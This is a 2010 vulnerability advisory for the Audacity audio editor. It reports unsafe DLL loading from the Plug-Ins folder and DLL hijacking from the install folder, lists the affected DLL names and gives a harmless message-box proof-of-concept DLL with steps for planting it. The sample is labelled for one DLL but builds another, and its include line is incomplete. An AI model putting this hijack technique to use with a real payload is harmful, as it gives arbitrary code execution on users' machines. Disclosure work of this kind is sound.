Audacity <= 1.3 Beta Multiple Local Vulnerabilities Name Audacity Vendor http://audacity.sourceforge.net Versions Affected <= 1.3 Beta Author Salvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date 2010-10-29 X. INDEX I. ABOUT THE APPLICATION II. DESCRIPTION III. ANALYSIS IV. SAMPLE CODE V. FIX I. ABOUT THE APPLICATION ________________________ Audacity is free, open source software for recording and editing sounds. II. DESCRIPTION _______________ The vulnerabilities are caused due to the application loading libraries in an insecure manner. I tested the versions 1.2.6 (stable) and the 1.3 Beta. Other versions could be vulnerable. III. ANALYSIS _____________ Summary: A) Unsafe DLL Loading B) DLL Hijacking A) Unsafe DLL Loading _____________________ Audacity tries to load each DLLs present in the Plug-Ins directory without specifing any name. This can be exploited to execute arbitrary code with the privileges of the current logged user. I/O on filesystem and socket have been tested correctly. B) DLL Hijacking ________________ The Audacity's installation folder by defaul t doesn't contains DLLs files. When it tries to load some DLLs, first of all, looks at the installation directory and after in system32 directory. Due of this is possible to hijack the load operation in order to load a malicious DLL file with the same name. The following is the list of affected DLLs: wintrust.dll msasn1.dll msacm32.dll midimap.dll wsock32.dll ws2_32.dll ws2help.dll winmm.dll lpk.dll usp10.dll setupapi.dll crypt32.dll IV. SAMPLE CODE _______________ A/B) Unsafe DLL Loading / DLL Hijacking The following is the sample code (evil.c) for wintrust.dll: // compile: gcc -shared -o psapi.dll evil.c #include BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { MessageBox(0, "DLL Hijacking!", "Salvatore Fresta", MB_OK); return TRUE; } Just copy it to Plug-Ins directory to exploiting the first security flaw and into the installation directory to exploiting the second security flaw. V. FIX ______ No fix.